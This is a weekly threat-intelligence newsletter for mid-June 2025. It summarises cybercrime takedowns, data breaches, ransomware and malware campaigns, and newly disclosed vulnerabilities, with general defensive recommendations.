HomeSecurity ResourcesThreat BriefingsVerSprite Weekly Threat Intelligence

VerSprite Weekly Threat Intelligence

Date Range: 16 June 2025 – 20 June 2025

Issue: 19th Edition

Security Triumphs of the Week

This week saw significant cybersecurity victories through global collaboration: Operation Deep Sentinel dismantled the Archetyp darknet market, arresting its administrator and seizing €7.8 million, while U.S. agencies recovered $225 million in crypto linked to scams. Ukraine extradited a ransomware suspect tied to $100+ million in extortion, and Thai authorities disrupted a hybrid ransomware-gambling operation. Apple patched a zero-click spyware flaw exploited against journalists, and a $5.48 million settlement addressed HealthEC’s breach of 4.6 million records. These efforts highlight law enforcement’s growing capacity to counter cross-border cybercrime, hybrid threats, and sophisticated financial laundering.

Operation Deep Sentinel: Authorities Shut Down Darknet Market Archetyp
Operation Deep Sentinel led to the takedown of Archetyp Market, a major darknet platform facilitating illegal drug sales and transactions via Monero. Authorities arrested its German administrator in Spain, alongside raids in Germany, Romania, Sweden, and the Netherlands, seizing devices, €7.8 million in assets, and disabling critical servers. The marketplace had 612,000 users, 3,200 vendors, and €250 million in turnover. International collaboration highlighted law enforcement’s growing ability to disrupt sophisticated darknet operations. The operation underscores ongoing efforts to combat cybercrime and illicit online markets.
Read full article: Gbhackers

US Recovers $225 Million of Crypto Stolen in Investment Scams
The U.S. Department of Justice, alongside the FBI, Secret Service, and private firms Tether and TRM Labs, recovered $225 million in cryptocurrency stolen through investment scams, marking the largest crypto seizure in U.S. Secret Service history. The funds, linked to over 400 victims, were laundered via a complex network of crypto addresses to obscure their origin. Blockchain analysis revealed the fraudsters used 93 scam deposit addresses, 35 intermediary wallets, and consolidated funds into seven USDT wallet groups. One victim, a bank CEO, lost $47.1 million after being tricked into fraudulent crypto investments. Tether froze and reissued the stolen USDT to enable government recovery under federal forfeiture laws. The operation highlights advanced laundering tactics, including coordinated fake KYC documents and excessive gas fees to hinder tracing. Authorities aim to identify victims for restitution but have not yet detailed this phase.
Read full article: Bleepingcomputer

Ukraine Extradites Suspected Ransomware Group Member to US
Ukraine extradited a 33-year-old foreign national to the U.S. for alleged involvement in a ransomware group linked to Ryuk and other strains. The suspect, arrested in Kyiv in April 2024, specialized in breaching corporate networks, enabling ransomware attacks on over 2,400 organizations across 70+ countries, extorting $100+ million. The operation involved international collaboration, including Europol and U.S. agencies, following seizures in 2023 that identified the suspect. The group, previously tied to Conti and TrickBot, disbanded in 2022 after supporting Russia’s invasion of Ukraine. Ukrainian authorities also seized crypto assets, luxury cars, and land during the investigation, building on prior arrests in 2021 and 2023.
Read full article: Bankinfosec

Ransomware Gang Busted by Authorities; Devices and Evidence Seized
Thai authorities raided the Antai Holiday Hotel in Pattaya, dismantling a dual criminal operation involving a gambling den and a ransomware cybercrime ring. The June 16 operation uncovered gambling activities on the second floor and a ransomware hub on the eighth floor, where six Chinese nationals targeted Chinese companies. Authorities seized nine laptops, 15 mobile devices, and arrested 20 foreigners, primarily Chinese nationals, for cybercrime, illegal gambling, and immigration violations. The raid underscores the convergence of cybercrime (ransomware, identity theft) and traditional organized crime (gambling, money laundering). Suspects face deportation and entry bans if convicted. The incident highlights evolving criminal tactics and law enforcement challenges in addressing hybrid digital-physical threats. Investigations continue to uncover the gang’s full operations.
Read full article: Gbhackers

Apple Fixes Zero-Click Exploit Underpinning Paragon Spyware Attacks
Apple addressed a zero-click vulnerability (CVE-2025-43200) in iOS/iPadOS 18.3.1, exploited via malicious iCloud Links to deploy Paragon’s Graphite spyware. Two Italian journalists from Fanpage.it were targeted between January and February 2024, confirmed by Citizen Lab, which linked the attacks to a single group. The spyware operated covertly in memory, evading detection. Italy terminated its contract with Paragon after a parliamentary report revealed seven Graphite victims, including activists. Apple and WhatsApp issued alerts to targeted users globally. Experts recommend enabling Lockdown Mode and updating devices to mitigate such sophisticated spyware threats.
Read full article: Theregister

Security Setbacks of the Week

The past week saw widespread cyberattacks targeting diverse sectors, with ransomware (Krispy Kreme, Freedman HealthCare), data breaches (Zoomcar, 23andMe), and statealigned espionage (Washington Post, Paragon spyware) compromising millions of records and disrupting operations. Emerging threats included weaponized infostealer datasets (16 billion credentials) and sophisticated scams exploiting search ads and Instagram deepfakes. Critical infrastructure vulnerabilities were highlighted by WestJet’s service disruptions and healthcare data extortion attempts. Persistent issues like weak authentication (23andMe), insider negligence (FCA), and delayed breach responses amplified risks, underscoring the urgent need for enhanced security protocols, multi-factor adoption, and proactive threat monitoring across industries.

Krispy Kreme Data Breach Exposes Customer Personal Information
Krispy Kreme suffered a ransomware attack in late 2024, compromising personal data of over 160,000 individuals, primarily employees and customers. The Play ransomware group stole 184 GB of sensitive data, including Social Security numbers, financial details, and medical information, later leaking it after the company refused to pay the ransom. Breach impacts spanned employee records, customer data, and operational disruptions, particularly in online systems. Krispy Kreme engaged cybersecurity experts, notified affected individuals, and offered credit monitoring services. Costs exceeded $11 million, with further expenses anticipated for enhanced security measures.
Read full article: Gbhackers

Zoomcar Data Breach Exposes Sensitive Details of 8.4 Million Users
Zoomcar Holdings confirmed a data breach affecting 8.4 million users, detected on June 9, 2025, and disclosed via an SEC filing. Compromised data includes names, phone numbers, addresses, email addresses, and car registration details, though financial data and passwords were reportedly unaffected. The breach stemmed from unauthorized access by an external threat actor, prompting Zoomcar to activate incident response protocols, enhance network safeguards, and engage cybersecurity experts. Authorities were notified, with no operational disruptions reported. Users face risks of phishing and identity theft, prompting advisories to monitor accounts and remain vigilant. The incident highlights escalating cyber threats to consumer platforms and potential legal, financial, and reputational repercussions for Zoomcar.
Read full article: Gbhackers

23andMe Hit with £2.3M Fine After Exposing Genetic Data of Millions
The UK’s Information Commissioner’s Office fined 23andMe £2.3 million for a 2023 breach exposing genetic and personal data of 6.9 million users. Attackers used credential stuffing to access 14,000 accounts, exploiting weak security measures like absent multi-factor authentication and inadequate threat detection. A five-month delay in addressing the breach amplified the impact, as compromised accounts via the DNA Relatives feature exposed millions more. The fine was reduced from an initial £4.59 million after negotiations. 23andMe, now in Chapter 11 bankruptcy, faces challenges paying the penalty but claims improved security measures. The breach highlighted systemic failures in protecting sensitive data, prompting a joint UK-Canada regulatory investigation.
Read full article: Theregister

Canadian Airline WestJet Suffers Cyberattack, Halts App and Web Services
WestJet, Canada’s second-largest airline, experienced a cyberattack on June 13, disrupting its mobile app, website, and internal systems. The incident caused intermittent outages for customers, though flight operations remained unaffected and secure. The airline activated specialized teams, collaborating with law enforcement and Transport Canada to investigate and mitigate impacts. No confirmed data breaches or ransom demands have been disclosed yet. WestJet advised customers and staff to remain vigilant against potential phishing attempts. The attack reflects a broader trend of cyber threats targeting Canadian critical infrastructure. Regular updates are being provided as the company works to restore services and ensure transparency.
Read full article: Gbhackers

Billions of Logins for Apple, Google, Facebook, Telegram, and More Found Exposed Online
Cybernews researchers uncovered 30 exposed datasets totaling 16 billion login credentials for major platforms like Apple, Google, Facebook, and Telegram, linked to infostealer malware. These fresh, weaponizable datasets—not recycled breaches—were briefly exposed, leaving credentials in criminal hands. Risks include account takeovers, identity theft, targeted phishing, and ransomware attacks. Infostealers harvest data from browsers, apps, and crypto wallets, emphasizing the need for updated anti-malware tools, unique passwords via managers, and phishing-resistant 2FA (e.g., FIDO2 keys). The scale highlights infostealers’ effectiveness, urging proactive protection and monitoring of exposed personal data.
Read full article: Malwarebytes

Hackers Target and Hijack Washington Post Journalists’ Email Accounts
A targeted cyberattack compromised several Washington Post journalists’ email accounts, discovered on June 12, prompting a system-wide password reset and forensic investigation. The breach primarily affected reporters covering national security, economic policy, and Chinarelated topics, suggesting potential state-sponsored involvement. While no customer data or other systems were impacted, the incident mirrors past attacks on media outlets like News Corp in 2022. Experts highlight journalists’ vulnerability to cyber espionage due to their access to sensitive information. The attack underscores escalating digital threats to press freedom, risking both confidential sources and journalistic integrity.
Read full article: Gbhackers

Paragon Commercial Spyware Infects Prominent Journalists
The Citizen Lab identified that Paragon Solutions’ Graphite spyware targeted two European journalists via a zero-click iOS exploit (CVE-2025-24200), patched by Apple in February. Forensic analysis linked both attacks to a single Paragon operator, using servers and a shared iMessage account. One victim, an anonymous journalist, was compromised in January February, while Italian journalist Ciro Pellegrino and another editor at Fanpage.it were also affected. Evidence suggests the Italian government used Graphite against activists, per a parliamentary report. Paragon, acquired by AE Industrial Partners, faces ongoing scrutiny for enabling surveillance of dissidents and journalists, reflecting broader risks of commercial spyware misuse.
Read full article: Darkreading

Remorseless Extortionists Claim to Have Stolen Thousands of Files from Freedman HealthCare
An extortion group, World Leaks (formerly Hunters International), claims to have stolen 52.4 GB of sensitive data from Freedman HealthCare, a firm managing healthcare databases for state agencies and insurers. They threatened to leak 42,204 files, potentially exposing insurance, claims, and payment data of millions. Freedman’s CEO disputed the severity, stating a prior April incident only affected a single server, with no protected health information compromised. Independent analysis of the leaked data revealed management accounts, passwords, and contracts but no personal data. World Leaks has a history of high-profile attacks, The breach underscores risk to critical healthcare infrastructure despite disputed impacts.
Read full article: Theregister

Scammers Hijack Websites of Bank of America, Netflix, Microsoft, and More to Insert Fake Phone Number
Scammers are exploiting search parameter injection attacks to hijack legitimate websites of major brands like Bank of America, Netflix, Microsoft, and PayPal. By purchasing sponsored Google ads posing as these brands, attackers redirect users to genuine support pages but inject fake phone numbers into search results. The URLs remain legitimate, masking the fraud, and victims are tricked into contacting scammers who steal financial data or gain remote access. This vulnerability arises from insufficient input sanitization in search functionalities, as seen with Netflix. Malwarebytes Browser Guard detects such hijacking, warning users of altered results.
Read full article: Malwarebytes

Fake Bank Ads on Instagram Scam Victims Out of Money
Fake Instagram ads impersonating major banks like BMO and EQ Bank are scamming users through deepfake videos and typosquatted domains. These fraudulent ads mimic legitimate branding, offering unrealistic returns or fake investment groups via WhatsApp to steal login credentials or funds. Scammers exploit urgency and authority, such as impersonating bank executives, to pressure victims into sharing sensitive information. Tactics include redirecting users to fake login pages or malicious sites after clicking ads. Recommendations to avoid scams include verifying ads through official channels, enabling multi-factor authentication, and scrutinizing suspicious visuals or language. The scams highlight risks across social platforms like Instagram, X, and WhatsApp.
Read full article: Malwarebytes

Slapped Wrists for Financial Conduct Authority Staff Who Emailed Work Data Home
Four UK Financial Conduct Authority (FCA) staff received warnings for emailing work data to personal accounts during 2022/23, with three receiving first written warnings and one already on a final warning. The FCA, responsible for regulating financial data breaches, did not disclose specifics of the data involved. A potential fifth incident was withheld under FoI exemptions to protect identities. Experts criticized the breaches as reckless, urging stronger data protection measures amid rising cyber risks. The FCA acknowledged no similar incidents in 2023/24 or 2024/25. This follows past FCA data leaks, including a 2020 FoI response exposing 1,600 complainants’ details, mirroring breaches in other UK public sector bodies.
Read full article: Theregister

Armored Cash Transport Trucks Allegedly Hauled Money for $190 Million Cryptolaundering Scheme
Australian authorities charged four individuals in a $190 million crypto-laundering scheme using a security firm’s armored trucks to mix illicit funds with legitimate cash, funneled through third-party businesses and crypto exchanges. APNIC restructured its organization to eliminate silos, forming new teams to align with strategic goals and aiming to resolve budget deficits by 2027. India reduced minimum size requirements for special economic zones, enabling Micron’s semiconductor plant and boosting chipmaking investments. Cambodia banned Thai internet connections amid cross-border scam camp tensions, causing local outages. AWS pledged $13 billion to expand Australian data centers, focusing on AI and cloud services. Other developments included China’s AI satellite initiatives, Infosys’ resolved tax probe, and Qualcomm’s Vietnam AI research center.
Read full article: Theregister

The New Emerging Threats

Emerging cyber threats showcase escalating sophistication, with ransomware groups like Qilin and Anubis employing advanced encryption, double extortion, and irreversible data destruction across healthcare, finance, and critical infrastructure. North Korean actors (BlueNoroff, Famous Chollima, KimJongRAT) leverage AI deepfakes, macOS malware, and social engineering to target crypto and blockchain sectors, while Android banking trojans like Godfather weaponize legitimate apps for real-time data theft. APT campaigns in East Asia and Europe exploit phishing, zero-days, and cloud infrastructure, alongside fileless malware and deceptive travel platforms distributing RATs. Social engineering remains pervasive, with groups like Scattered Spider bypassing MFA via help desk impersonation, underscoring the need for enhanced endpoint security, behavioral monitoring, and proactive vulnerability management.

Qilin Ransomware Rises as Major Threat, Demanding $50M in Ransom
The Qilin ransomware group, rebranded from Agenda in 2023, has emerged as a top cyber threat, demanding ransoms up to $50 million. Operating a Ransomware-as-a-Service (RaaS) model, Qilin recruit’s affiliates through Russian forums, offering 85% revenue shares. Its malware, rewritten in Rust, targets Windows, Linux, and VMware systems with advanced encryption, anti-forensics, and double extortion tactics. Notable attacks include disrupting the UK’s NHS via Synnovis Group, causing widespread healthcare delays. Qilin opportunistically exploits vulnerabilities across sectors like healthcare, finance, and manufacturing, avoiding CIS countries. Security experts urge proactive defenses, including patching and phishing mitigation, to counter its evolving threats.
Read full article: Gbhackers

North Korean Hackers Deepfake Execs in Zoom Call to Spread Mac Malware
North Korean hacking group BlueNoroff (aka Sapphire Sleet) used AI-generated deepfakes of company executives in Zoom calls to distribute macOS malware targeting cryptocurrency theft. Posing as professionals via Telegram, attackers lured a tech firm employee into a fake Zoom meeting, where deepfaked participants prompted the victim to download a malicious AppleScript disguised as a Zoom fix. The script deployed multiple payloads, including backdoors, surveillance tools, and crypto stealers like Root Troy V4 and CryptoBot. Researchers identified sophisticated tactics, including disabling security logs and leveraging legitimate certificates to evade detection. This campaign highlights BlueNoroff’s evolving use of social engineering and macOS-focused malware, underscoring rising threats to Apple devices in enterprise environments. Huntress warns organizations to enhance Mac security amid increasing APT targeting.
Read full article: Bleepingcomputer

Godfather Malware Turns Real Banking Apps Into Spy Tools
The Godfather Android banking Trojan has evolved to weaponize legitimate financial apps by cloning them within a virtual environment on infected devices, enabling real-time data theft. This new variant uses frameworks like VirtualApp to create a sandboxed space where genuine banking and crypto apps run under attacker control, bypassing traditional overlay tactics. By leveraging Android Accessibility Services and network interception, the malware captures login credentials, 2FA codes, and transaction details while manipulating app-server communications. It also enables remote device control, suppressing detection indicators. Targeting 500+ apps globally, including 12 Turkish banks, the campaign represents a significant escalation in mobile threats, combining stealth with operational sophistication.
Read full article: Bankinfosec

Chollima Hackers Target Windows and MacOS with New GolangGhost RAT Malware
A North Korean-linked threat actor, Famous Chollima, deployed new Python (PylangGhost) and Golang (GolangGhost) RAT variants targeting Windows and macOS users, particularly cryptocurrency and blockchain professionals. The group uses fake job platforms mimicking companies like Coinbase to lure victims into executing malicious commands disguised as camera driver installations. Windows infections involve PowerShell-driven ZIP file extraction, while macOS uses Bash scripts. The malware steals credentials from browsers, wallets (e.g., MetaMask), and password managers, enabling remote system control. Cisco Talos reports limited impact, mainly in India, and provides detection tools. Organizations in crypto sectors are advised to enhance vigilance against such social engineering attacks.
Read full article: Bankinfosec

New KimJongRAT Stealer Uses Weaponized LNK File to Deploy PowerShell-Based Dropper
Two new KimJongRAT stealer variants employ weaponized LNK files to initiate multi-stage attacks, deploying PowerShell or PE-based droppers. The malware masquerades as legitimate documents, luring victims to trigger malicious scripts that download HTA files from attacker-controlled CDNs. The PowerShell variant drops decoy PDFs while extracting ZIP archives containing scripts to decode and execute stealers targeting crypto wallets (MetaMask, Trust Wallet) and browser credentials. The PE variant uses DLL loaders for broader theft, including FTP and email data. Both variants leverage encrypted communications (XOR/RC4) and CDN-hosted payloads to evade detection. Palo Alto Networks highlights defenses via Advanced WildFire and Cortex XDR, noting KimJongRAT’s continued evolution since 2013.
Read full article: Gbhackers

Hackers Use Fake Verification Prompt and Clickfix Technique to Deploy Fileless AsyncRAT
A new campaign distributes a fileless AsyncRAT variant via fake verification prompts targeting German-speaking users. Attackers trick victims into copying malicious commands, leveraging obfuscated PowerShell scripts and in-memory execution to avoid file-based detection. The payload connects to C2 servers, establishes persistence via registry keys, and enables remote control, credential theft, and data exfiltration. Techniques include hidden PowerShell instances, reversed C# code compilation, and non-standard port communication (4444). Mitigations involve blocking suspicious PowerShell, monitoring registry changes, enforcing network segmentation, and enabling memory scanning. The campaign highlights evolving fileless malware tactics to bypass traditional defenses.
Read full article: Gbhackers

Scattered Spider Targeting American Insurance Firms
Scattered Spider, a financially motivated hacking group primarily composed of English-speaking adolescents, has shifted focus to target U.S. insurance firms through social engineering tactics, including impersonating help desk staff to bypass multi-factor authentication. Google’s Threat Intelligence Group warned of multiple intrusions linked to the group, which previously attacked British retailers and over 130 companies, including MGM Resorts and Clorox. Recent incidents include network outages at Philadelphia Insurance and Erie Insurance following unauthorized access. The group’s affiliate model enables resilience against law enforcement, with its rise partly attributed to crackdowns on Russian-speaking cybercrime syndicates. Experts recommend bolstering identity verification, hardening service desk processes, and monitoring behavioral anomalies to mitigate risks.
Read full article: Bankinfosecurity

Threat Actors Deploy XWorm Malware via Fake Travel Websites to Infect Users’ PCs
A sophisticated malware campaign targeting vacation planners through fake Booking.com travel websites was uncovered by HP Threat Research in Q1 2025. Attacker’s exploit “click fatigue” with counterfeit GDPR cookie banners, tricking users into downloading malicious JavaScript that initiates XWorm RAT deployment. The multi-stage attack uses PowerShell scripts and a .NET binary to inject XWorm into legitimate processes like MSBuild.exe, evading detection via process hollowing. Campaigns also employed unusual file formats (. mslibrary, .svg) to distribute DCRat and AsyncRat through email and WebDAV. This reflects a broader surge in malware targeting travel platforms, leveraging social engineering and trusted services to bypass defenses. HP emphasizes the need for advanced endpoint security and user vigilance against deceptive prompts.
Read full article: Gbhackers

Anubis Ransomware Introduces Irreversible File Destruction Feature
Anubis, a Ransomware-as-a-Service (RaaS) operation active since December 2024, combines file encryption with irreversible file destruction via its “wipe mode,” permanently deleting data even if ransoms are paid. Targeting sectors like healthcare and engineering across multiple countries, it employs spear-phishing, command-line execution, and privilege escalation to deploy its payload. The ransomware uses ECIES encryption, appends “. anubis” to files, deletes Volume Shadow Copies, and disrupts critical services to hinder recovery. Its affiliate program, advertised on cybercrime forums, supports double extortion by threatening data leaks. Anubis’s evolution from the Sphinx prototype highlights its growing sophistication, urging organizations to adopt offline backups, strict access controls, and enhanced phishing defenses to mitigate risks.
Read full article: Gbhackers

Kimsuky and Konni APT Groups Lead Active Attacks Targeting East Asia
In April 2025, APT groups Kimsuky and Konni led targeted attacks in East Asia, focusing on government, financial, and research sectors via spear phishing (70% of incidents), using tailored lures like trilateral cooperation themes. Sidewinder targeted South Asian governments, while APT29 (Cozy Bear) attacked European diplomats with GRAPELOADER and WINELOADER. North Korea’s Lazarus exploited vulnerabilities in South Korean software (Cross EX, Innorix) through the “SyncHole” operation, deploying watering hole attacks and trojans like ThreatNeedle. These campaigns highlight escalating APT sophistication, blending social engineering and technical exploits, stressing the need for enhanced cybersecurity measures globally.
Read full article: Gbhackers

Serpentine#Cloud Uses Cloudflare Tunnels in Sneak Attacks
The Serpentine#Cloud campaign employs Cloudflare Tunnels and obfuscated Python loaders to deliver memory-injected malware via phishing emails containing malicious .lnk files. Attackers use zipped attachments disguised as documents to initiate a chain of scripts, evading detection by leveraging Cloudflare’s trusted infrastructure for payload delivery. Targets include organizations in the US, UK, Germany, Europe, and Asia. The attack deploys decoy PDFs, checks for antivirus software, and establishes persistence via startup folders, culminating in a backdoored system. While sophisticated, the campaign’s use of open-source tools and coding inconsistencies suggest it may not align with major nation-state actors. Securonix highlights the campaign’s stealthy blend of social engineering and living-off-the-land techniques, urging vigilance against phishing and enhanced endpoint monitoring
Read full article: Darkreading

‘HoldingHands’ Acts Like a Pickpocket with Taiwan Orgs
A sophisticated cyber campaign targets Taiwanese organizations via phishing emails impersonating government entities like the National Taxation Bureau. Attackers deliver malicious ZIP files containing multistage payloads, including the HoldingHands RAT (Gh0stBins), which exfiltrates data and enables surveillance. The infection chain uses shellcode, loaders, and encrypted configurations to evade detection, harvesting system data, user information, and registry values. The threat actor employs multiple malware variants (Winos 4.0, Gh0stCringe) in coordinated waves, suggesting state-backed, well-resourced operations. This aligns with broader trends of China-linked groups intensifying attacks on Taiwan’s government and telecom sectors. Experts emphasize the need for real-time behavioral analysis to counter evolving tactics.
Read full article: Darkreading

Vulnerability Spotlight: Critical Exposures Unveiled

Critical vulnerabilities across diverse systems—including SD-WAN platforms, CMS, backup software, and Linux modules—highlight systemic security gaps enabling RCE, privilege escalation, and authentication bypass. High-severity flaws (CVSS 7.2–9.9) in products like Versa Director, Veeam Backup, and Sitecore CMS expose organizations to supply chain attacks, botnet conscription, and data theft. Exploitation risks escalate with public PoCs, coordinated attacks (e.g., Zyxel firewalls targeted via Mirai-linked payloads), and default credential retention. While patches exist for most vulnerabilities, delayed updates and misconfigurations (e.g., exposed UDP ports, unvalidated endpoints) leave networks vulnerable. Proactive patching, access control hardening, and monitoring for postexploitation activity are critical to mitigate cascading threats.

CVE-2025-23171 & CVE-2025-23172: Versa Director Bugs Open Doors to Webshell Uploads and Command Execution
Two critical vulnerabilities (CVE-2025-23171 and CVE-2025-23172) in Versa Director’s SDWAN platform allow authenticated attackers to execute remote code or escalate privileges. CVE-2025-23171 exploits insecure file uploads, bypassing UI restrictions to deploy webshells, while CVE-2025-23172 abuses webhook functions to execute commands as a sudo-privileged user. Both carry a CVSS score of 7.2 and affect multiple versions, with patches released for specific builds starting February and June 2025. Though no active exploitation is reported, public PoC code increases the risk of attacks. Organizations are urged to apply updates, as unpatched systems remain vulnerable to RCE and system takeover
Read full article: Securityonline

Cisco ClamAV Critical Flaws: CVE-2025-20260 (CVSS 9.8) Allows Code Execution
Cisco’s ClamAV addressed two critical vulnerabilities: CVE-2025-20260 (CVSS 9.8) and CVE-2025-20234 (CVSS 5.3). The first, a buffer overflow in PDF scanning under configurations with large file/scan size limits, risks denial-of-service (DoS) or remote code execution (RCE). The second, a memory overread in UDF file processing, could trigger DoS. Both flaws affect enterprise environments using high-throughput scanning. Patched versions 1.4.3 and 1.0.9 resolve these issues. Organizations are urged to update immediately, especially if custom scan thresholds are enabled.
Read full article: Securityonline

WordPress AI Engine Flaw (CVE-2025-5071): Critical Bug Allows Subscriber-Level Account Takeover
A critical vulnerability (CVE-2025-5071) in WordPress’s AI Engine plugin allows subscriber level users to escalate privileges and take full control of websites. The flaw, with a CVSS score of 8.8, affects sites with Dev Tools and Model Context Protocol (MCP) enabled, bypassing authentication checks via a missing empty value validation in the MCP access function. Attackers can exploit this to execute commands like wp_update_user, granting administrator rights and enabling malicious actions such as uploading backdoors or injecting phishing content. Patched in version 2.8.4, the vulnerability highlights risk in AI automation tools. Users are urged to update immediately.
Read full article: Securityonline

ASUS Armoury Crate Vulnerability Lets Hackers Gain System-Level Access on Windows
A critical vulnerability (CVE-2025-3464) in ASUS Armoury Crate software allows attackers to escalate privileges to SYSTEM-level access on Windows systems. The flaw, found in the AsIO3.sys kernel driver, exploits a TOCTOU race condition by bypassing authorization checks via hardcoded hashes and process ID allow lists. Affected versions range from 5.9.9.0 to 6.1.18.0, enabling attackers with local access to execute malicious code, manipulate hardware, or install persistent malware. ASUS confirmed the high-severity flaw (CVSS 8.8) and released patches via its Update Center. While no active exploits are reported, users must update immediately to mitigate risks of data theft, ransomware, or system compromise. The widespread use of Armoury Crate amplifies its threat potential.
Read full article: Gbhackers

Apache Traffic Server Flaws Allow Access Bypass & Remote DoS
A recent vulnerability report highlights critical flaws in Apache Traffic Server (ATS) that could allow attackers to bypass access controls and trigger remote denial-of-service (DoS) conditions. The vulnerabilities, identified in components like the ESI plugin and PROXY protocol, enable unauthorized access to restricted content and disrupt services. These issues, disclosed on June 19, 2025, pose significant risks to organizations using ATS for content caching and proxy services. Exploiting these flaws could lead to data exposure or prolonged service outages. Full details of the vulnerabilities are restricted to verified supporters. Users are urged to monitor for patches and updates from Apache.
Read full article: Securityonline

Critical Auth Bypass Vulnerability (CVE-2025-51381) Found in KAON KCM3100 Gateways
A critical authentication bypass vulnerability (CVE-2025-51381, CVSS 9.8) was discovered in KAON KCM3100 Wi-Fi gateways, affecting versions 1.4.2 and earlier. The flaw allows local attackers to bypass authentication via alternate access paths, enabling unauthorized administrative access without credentials. Exploitation requires LAN access, potentially through compromised devices or physical entry, leading to configuration changes, traffic interception, malware deployment, or full network control. KAON released firmware version 1.4.8 to address the issue, urging immediate updates to mitigate risks of network compromise.
Read full article: Securityonline

Open Next SSRF Flaw in Cloudflare Lets Hackers Fetch Data from Any Host
A critical SSRF vulnerability (CVE-2025-6087) was identified in the @opennextjs/cloudflare package, allowing attackers to proxy malicious content through vulnerable Next.js sites via the unvalidated /_next/image endpoint. This flaw enabled unauthorized data fetching from arbitrary hosts, facilitating phishing, domain abuse, and bypassing same-origin policies. Affected versions prior to 1.3.0 exposed sites to risks like internal service exposure and deceptive content distribution. Cloudflare mitigated the issue via server-side updates restricting nonimage content and released patched version 1.3.0. Users are advised to upgrade and configure trusted image sources. Researcher Edward Coristine responsibly disclosed the flaw, which was promptly resolved.
Read full article: Gbhackers

Veeam Vulnerabilities Expose Backup Servers to Remote Attacks
Veeam disclosed three critical vulnerabilities in its backup software, posing risks of remote code execution and privilege escalation. CVE-2025-23121 (CVSS 9.9) allows authenticated domain users to execute arbitrary code on domain-joined backup servers. CVE-2025-24286 (CVSS 7.2) enables Backup Operators to modify jobs for code execution, risking lateral movement. CVE-2025-24287 (CVSS 6.1) permits local users on Windows agents to escalate privileges. Affected products include Veeam Backup & Replication ≤12.3.1.1139 and Veeam Agent for Windows ≤6.3.1.1074. Patches are available in versions 12.3.2 and 6.3.2, with urgent updates recommended. Security measures include isolating backup infrastructure and limiting domain-joined servers.
Read full article: Gbhackers

Zyxel Devices Under Attack as Hackers Exploit UDP Port RCE Flaw
A coordinated global cyberattack campaign targeted Zyxel firewall/VPN devices on June 16, 2025, exploiting critical RCE vulnerability CVE-2023-28771 (CVSS 9.8) via UDP port 500. Attackers injected malicious IKE packets to execute unauthorized commands, potentially hijacking unpatched devices. The synchronized attacks originated from 244 previously unseen IPs, geolocated to the U.S. but possibly spoofed, targeting organizations in the U.S., U.K., Spain, Germany, and India. Evidence links payloads to Mirai botnet variants, risking device conscription into DDoS networks. Mitigations include immediate patching, blocking malicious IPs, restricting UDP port 500 exposure, and monitoring for post-exploitation activity. The incident highlights urgent patch management needs for Zyxel users.
Read full article: Gbhackers

Sitecore CMS flaw let attacker’s brute-force ‘b’ for backdoor
Security researchers disclosed three critical vulnerabilities in Sitecore Experience Platform CMS, enabling attackers to chain flaws for full system compromise. These include hardcoded credentials (password “b” for admin accounts), path traversal in ZIP unpacking, and an unrestricted file upload flaw. Exploiting these allows remote code execution (RCE), particularly when combined with the PowerShell Extension add-on. Over 22,000 Sitecore instances were exposed, impacting enterprises like United Airlines and Microsoft. Patches were released in version 10.4 (May 11), but Sitecore historically discouraged changing default credentials, increasing risk. The vulnerabilities highlight systemic security gaps in widely used enterprise CMS platforms.
Read full article: Theregister

Root Access Unlocked: How a pam_namespace Flaw Lets Attackers Elevate Privileges on Linux
A critical vulnerability in the Linux PAM module pam_namespace allows local attackers to escalate privileges to root via race condition and symlink attacks. The flaw stems from improper handling of temporary files during user session initialization, enabling unprivileged users to manipulate directory structures and bypass security controls. Successful exploitation grants full system access through privilege escalation (LPE), posing significant risks to multiuser environments. The vulnerability affects default configurations across multiple Linux distributions. Security researchers emphasize urgent patching as exploit vectors require minimal preconditions. This discovery highlights ongoing risks in privilege boundary implementations within core authentication subsystems.
Read full article: Securityonline

In-Depth Expert CTI Analysis

Recent cyber threat intelligence highlights intensified global law enforcement collaboration disrupting major darknet markets and ransomware operations, exemplified by Operation Deep Sentinel and international extraditions. Sophisticated ransomware-as-a-service models (Qilin, Anubis) and state-aligned APTs (BlueNoroff, Lazarus) demonstrate evolving tactics, including AI-driven social engineering and macOS malware. Critical vulnerabilities in widely used platforms (Cisco ClamAV, ASUS Armoury Crate, WordPress AI Engine) underscore systemic security risks, while high-impact breaches (Krispy Kreme, Zoomcar, 23andMe) reveal persistent gaps in data protection. Cybercriminal innovation converges with traditional organized crime in hybrid operations, evidenced by Thai ransomwaregambling hubs. Proactive defense measures and rapid patching remain critical as threat actors exploit both technical weaknesses and human vulnerabilities across sectors.

Proactive Defense and Strategic Foresight

Proactive defense and strategic foresight are critical in mitigating evolving cyber threats, as evidenced by recent incidents. Operation Deep Sentinel and international ransomware arrests demonstrate the necessity of preemptive collaboration to dismantle criminal infrastructure. Vulnerabilities like CVE-2025-3464 (ASUS) and CVE-2025-23171 (Versa Director) underscore the urgency of timely patching and rigorous vendor risk management. Emerging tactics—AI-driven deepfakes, fileless malware, and hybrid physical-digital operations—demand adaptive defenses, including behavioral analytics and zero-trust frameworks. The 23andMe breach and FCA data leaks highlight systemic failures in access controls and insider threat mitigation. Organizations must prioritize threat intelligence sharing, continuous attack surface monitoring, and investments in AI-driven detection to counter advanced adversaries like Qilin and BlueNoroff. Strategic foresight requires anticipating adversarial innovation while hardening critical infrastructure against cascading impacts.

Evolving Ransomware and Malware Tactics

Ransomware and malware tactics continue to evolve, blending technical sophistication with psychological manipulation. Recent operations highlight the rise of double extortion, where attackers encrypt data and threaten leaks, as seen in the Play ransomware attack on In-Depth Expert CTI Analysis VerSprite Weekly Threat Intelligence Newsletter 18 Krispy Kreme. Groups like Qilin and Anubis now employ RaaS models, Rust-based malware, and irreversible data destruction (“wipe mode”) to maximize impact. Social engineering has advanced with AI-generated deepfakes (BlueNoroff) and search parameter hijacking to deceive victims. Malware variants increasingly exploit trusted platforms, such as weaponized Android apps (Godfather) and fileless PowerShell scripts (AsyncRAT), while APTs like Lazarus target vulnerabilities in critical infrastructure. The convergence of cybercrime with traditional organized crime, evidenced in hybrid ransomware-gambling operations, underscores the need for proactive defense strategies, including zero-trust frameworks and enhanced threat intelligence sharing.

State-Sponsored and Organized Cybercrime Convergence

